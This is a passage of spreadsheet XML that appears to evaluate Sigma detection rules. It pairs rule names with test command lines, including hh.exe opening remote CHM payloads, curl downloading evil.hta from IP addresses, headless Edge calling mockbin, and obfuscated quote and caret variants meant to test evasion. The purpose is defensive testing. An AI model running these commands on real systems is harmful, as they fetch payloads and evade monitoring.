        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3491" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3491" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3491" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3491" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F3491" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3491" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3491" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3491" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3491" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3491" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3492" ht="15.75" customHeight="1" s="42">
      <c r="A3492" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3492" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3492" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3492" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3492" s="43" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F3492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3492" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3492" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3492" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3492" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3492" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3493" ht="15.75" customHeight="1" s="42">
      <c r="A3493" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3493" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3493" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3493" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3493" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F3493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3493" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3493" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3493" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3493" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3493" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3494" ht="15.75" customHeight="1" s="42">
      <c r="A3494" s="43" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B3494" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3494" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3494" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3494" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F3494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3494" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3494" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3494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3494" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3494" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3495" ht="15.75" customHeight="1" s="42">
      <c r="A3495" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3495" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_start_service</t>
        </is>
      </c>
      <c r="C3495" s="43" t="inlineStr">
        <is>
          <t>Start Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D3495" s="43" t="inlineStr">
        <is>
          <t>2a072a96-a086-49fa-bcb5-15cc5a619093</t>
        </is>
      </c>
      <c r="E3495" s="43" t="inlineStr">
        <is>
          <t>net  start  sesshijack</t>
        </is>
      </c>
      <c r="F3495" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3495" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3495" s="43" t="inlineStr">
        <is>
          <t>Start Windows Service Via Net.EXE (2a072a96-a086-49fa-bcb5-15cc5a619093); Start Windows Service Via Net.EXE (2a072a96-a086-49fa-bcb5-15cc5a619093)</t>
        </is>
      </c>
      <c r="J3495" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3495" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3496" ht="15.75" customHeight="1" s="42">
      <c r="A3496" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3496" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_start_service</t>
        </is>
      </c>
      <c r="C3496" s="43" t="inlineStr">
        <is>
          <t>Start Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D3496" s="43" t="inlineStr">
        <is>
          <t>2a072a96-a086-49fa-bcb5-15cc5a619093</t>
        </is>
      </c>
      <c r="E3496" s="43" t="inlineStr">
        <is>
          <t>net "start" sesshijack</t>
        </is>
      </c>
      <c r="F3496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3496" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3496" s="43" t="n"/>
      <c r="J3496" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3496" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3497" ht="15.75" customHeight="1" s="42">
      <c r="A3497" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B3497" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_start_service</t>
        </is>
      </c>
      <c r="C3497" s="43" t="inlineStr">
        <is>
          <t>Start Windows Service Via Net.EXE</t>
        </is>
      </c>
      <c r="D3497" s="43" t="inlineStr">
        <is>
          <t>2a072a96-a086-49fa-bcb5-15cc5a619093</t>
        </is>
      </c>
      <c r="E3497" s="43" t="inlineStr">
        <is>
          <t>net start "sesshijack"</t>
        </is>
      </c>
      <c r="F3497" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3497" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3497" s="43" t="inlineStr">
        <is>
          <t>Start Windows Service Via Net.EXE (2a072a96-a086-49fa-bcb5-15cc5a619093); Start Windows Service Via Net.EXE (2a072a96-a086-49fa-bcb5-15cc5a619093)</t>
        </is>
      </c>
      <c r="J3497" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3497" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3498" ht="15.75" customHeight="1" s="42">
      <c r="A3498" s="43" t="n"/>
      <c r="B3498" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C3498" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3498" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E3498" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F3498" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3498" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3498" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3498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3498" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3498" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3499" ht="15.75" customHeight="1" s="42">
      <c r="A3499" s="43" t="n"/>
      <c r="B3499" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C3499" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3499" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E3499" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F3499" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3499" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3499" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3499" s="4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3499" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3499" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3500" ht="15.75" customHeight="1" s="42">
      <c r="A3500" s="43" t="n"/>
      <c r="B3500" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C3500" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3500" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E3500" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F3500" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3500" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3500" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3500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3500" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3500" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3501" ht="15.75" customHeight="1" s="42">
      <c r="A3501" s="43" t="n"/>
      <c r="B3501" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C3501" s="43" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3501" s="43" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E3501" s="43" t="inlineStr">
        <is>
          <t>cscript.exe C:\Windows\System32\GATHER~1.VBS</t>
        </is>
      </c>
      <c r="F3501" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3501" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3501" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3501" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J3501" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3501" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3502" ht="15.75" customHeight="1" s="42">
      <c r="A3502" s="43" t="n"/>
      <c r="B3502" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C3502" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3502" s="43" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E3502" s="43" t="inlineStr">
        <is>
          <t>cmd.exe -"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F3502" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3502" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3502" s="4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3502" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3502" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3503" ht="15.75" customHeight="1" s="42">
      <c r="A3503" s="43" t="n"/>
      <c r="B3503" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C3503" s="43" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D3503" s="43" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E3503" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F3503" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3503" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3503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3503" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3503" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3504" ht="15.75" customHeight="1" s="42">
      <c r="A3504" s="43" t="n"/>
      <c r="B3504" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C3504" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D3504" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E3504" s="43" t="inlineStr">
        <is>
          <t>copy "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "C:\Windows\Temp\sys_updater.exe" &amp;&amp; "C:\Windows\Temp\sys_updater.exe" --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709</t>
        </is>
      </c>
      <c r="F3504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3504" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3504" s="43" t="n"/>
      <c r="J3504" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3504" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3505" ht="15.75" customHeight="1" s="42">
      <c r="A3505" s="43" t="n"/>
      <c r="B3505" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_cookie_hijacking</t>
        </is>
      </c>
      <c r="C3505" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking</t>
        </is>
      </c>
      <c r="D3505" s="43" t="inlineStr">
        <is>
          <t>5a6e1e16-07de-48d8-8aae-faa766c05e88</t>
        </is>
      </c>
      <c r="E3505" s="43" t="inlineStr">
        <is>
          <t>curl.exe --cookie-jar="cookie" "http://example.com"</t>
        </is>
      </c>
      <c r="F3505" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3505" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3505" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking (5a6e1e16-07de-48d8-8aae-faa766c05e88)</t>
        </is>
      </c>
      <c r="J3505" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3505" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3506" ht="15.75" customHeight="1" s="42">
      <c r="A3506" s="43" t="n"/>
      <c r="B3506" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_cookie_hijacking</t>
        </is>
      </c>
      <c r="C3506" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking</t>
        </is>
      </c>
      <c r="D3506" s="43" t="inlineStr">
        <is>
          <t>5a6e1e16-07de-48d8-8aae-faa766c05e88</t>
        </is>
      </c>
      <c r="E3506" s="43" t="inlineStr">
        <is>
          <t>curl.exe "--cookie-jar" cookie "http://example.com"</t>
        </is>
      </c>
      <c r="F3506" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3506" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3506" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking (5a6e1e16-07de-48d8-8aae-faa766c05e88)</t>
        </is>
      </c>
      <c r="J3506" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3506" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3507" ht="15.75" customHeight="1" s="42">
      <c r="A3507" s="43" t="n"/>
      <c r="B3507" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_cookie_hijacking</t>
        </is>
      </c>
      <c r="C3507" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking</t>
        </is>
      </c>
      <c r="D3507" s="43" t="inlineStr">
        <is>
          <t>5a6e1e16-07de-48d8-8aae-faa766c05e88</t>
        </is>
      </c>
      <c r="E3507" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe -c^ cookie "http://example.com"</t>
        </is>
      </c>
      <c r="F3507" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3507" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3507" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking (5a6e1e16-07de-48d8-8aae-faa766c05e88)</t>
        </is>
      </c>
      <c r="J3507" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3507" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3508" ht="15.75" customHeight="1" s="42">
      <c r="A3508" s="43" t="n"/>
      <c r="B3508" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_cookie_hijacking</t>
        </is>
      </c>
      <c r="C3508" s="43" t="inlineStr">
        <is>
          <t>Potential Cookies Session Hijacking</t>
        </is>
      </c>
      <c r="D3508" s="43" t="inlineStr">
        <is>
          <t>5a6e1e16-07de-48d8-8aae-faa766c05e88</t>
        </is>
      </c>
      <c r="E3508" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com' -SessionVariable 'cookie_session'"</t>
        </is>
      </c>
      <c r="F3508" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3508" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3508" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3508" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3508" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3508" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3509" ht="15.75" customHeight="1" s="42">
      <c r="A3509" s="43" t="n"/>
      <c r="B3509" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3509" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3509" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3509" s="43" t="inlineStr">
        <is>
          <t>curl.exe --user-agent "EvilAgent" http://example.com</t>
        </is>
      </c>
      <c r="F3509" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3509" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3509" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3509" s="43" t="n"/>
      <c r="J3509" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3509" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3510" ht="15.75" customHeight="1" s="42">
      <c r="A3510" s="43" t="n"/>
      <c r="B3510" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3510" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3510" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3510" s="43" t="inlineStr">
        <is>
          <t>curl.exe -A "EvilAgent" http://example.com</t>
        </is>
      </c>
      <c r="F3510" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3510" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3510" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3510" s="43" t="n"/>
      <c r="J3510" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3510" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3511" ht="15.75" customHeight="1" s="42">
      <c r="A3511" s="43" t="n"/>
      <c r="B3511" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3511" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3511" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3511" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl.exe -H^ "User-Agent: EvilAgent" http://example.com</t>
        </is>
      </c>
      <c r="F3511" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3511" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3511" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent (85de1f22-d189-44e4-8239-dc276b45379b)</t>
        </is>
      </c>
      <c r="J3511" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3511" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3512" ht="15.75" customHeight="1" s="42">
      <c r="A3512" s="43" t="n"/>
      <c r="B3512" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_custom_user_agent</t>
        </is>
      </c>
      <c r="C3512" s="43" t="inlineStr">
        <is>
          <t>Curl Web Request With Potential Custom User-Agent</t>
        </is>
      </c>
      <c r="D3512" s="43" t="inlineStr">
        <is>
          <t>85de1f22-d189-44e4-8239-dc276b45379b</t>
        </is>
      </c>
      <c r="E3512" s="43" t="inlineStr">
        <is>
          <t>curl.exe "-H" "User-Agent: EvilAgent" http://example.com</t>
        </is>
      </c>
      <c r="F3512" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3512" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3512" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3512" s="43" t="n"/>
      <c r="J3512" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3512" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3513" ht="15.75" customHeight="1" s="42">
      <c r="A3513" s="43" t="n"/>
      <c r="B3513" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_exec</t>
        </is>
      </c>
      <c r="C3513" s="43" t="inlineStr">
        <is>
          <t>File Download From IP URL Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3513" s="43" t="inlineStr">
        <is>
          <t>9cc85849-3b02-4cb5-b371-3a1ff54f2218</t>
        </is>
      </c>
      <c r="E3513" s="43" t="inlineStr">
        <is>
          <t>curl --output="hello.txt" https://0x0c22384e/hack/evil.txt</t>
        </is>
      </c>
      <c r="F3513" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3513" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3513" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3513" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); 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J3513" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3513" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3514" ht="15.75" customHeight="1" s="42">
      <c r="A3514" s="43" t="n"/>
      <c r="B3514" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_exec</t>
        </is>
      </c>
      <c r="C3514" s="43" t="inlineStr">
        <is>
          <t>File Download From IP URL Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3514" s="43" t="inlineStr">
        <is>
          <t>9cc85849-3b02-4cb5-b371-3a1ff54f2218</t>
        </is>
      </c>
      <c r="E3514" s="43" t="inlineStr">
        <is>
          <t>curl "--out""put" hello.txt https://12.34.56.78/hack/evil.txt</t>
        </is>
      </c>
      <c r="F3514" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3514" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3514" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3514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3514" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3514" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3515" ht="15.75" customHeight="1" s="42">
      <c r="A3515" s="43" t="n"/>
      <c r="B3515" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_exec</t>
        </is>
      </c>
      <c r="C3515" s="43" t="inlineStr">
        <is>
          <t>File Download From IP URL Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3515" s="43" t="inlineStr">
        <is>
          <t>9cc85849-3b02-4cb5-b371-3a1ff54f2218</t>
        </is>
      </c>
      <c r="E3515" s="43" t="inlineStr">
        <is>
          <t>curl -o hello.txt https://12.34.56.78/hack/evil.txt</t>
        </is>
      </c>
      <c r="F3515" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3515" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3515" s="43" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); 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J3515" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3515" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3516" ht="15.75" customHeight="1" s="42">
      <c r="A3516" s="43" t="n"/>
      <c r="B3516" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_susp_extensions</t>
        </is>
      </c>
      <c r="C3516" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From IP Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3516" s="43" t="inlineStr">
        <is>
          <t>5cb299fc-5fb1-4d07-b989-0644c68b6043</t>
        </is>
      </c>
      <c r="E3516" s="43" t="inlineStr">
        <is>
          <t>curl  -o benign.hta "https://12.34.56.78/hack/evil.hta"</t>
        </is>
      </c>
      <c r="F3516" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3516" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3516" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3516" s="43" t="inlineStr">
        <is>
          <t>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J3516" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3516" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3517" ht="15.75" customHeight="1" s="42">
      <c r="A3517" s="43" t="n"/>
      <c r="B3517" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_susp_extensions</t>
        </is>
      </c>
      <c r="C3517" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From IP Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3517" s="43" t="inlineStr">
        <is>
          <t>5cb299fc-5fb1-4d07-b989-0644c68b6043</t>
        </is>
      </c>
      <c r="E3517" s="43" t="inlineStr">
        <is>
          <t>curl  --output benign.hta "https://0x0c22384e/hack/evil.hta"</t>
        </is>
      </c>
      <c r="F3517" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3517" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3517" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3517" s="43" t="inlineStr">
        <is>
          <t>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J3517" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3517" s="43" t="b">
        <v>0</v>
      </c>
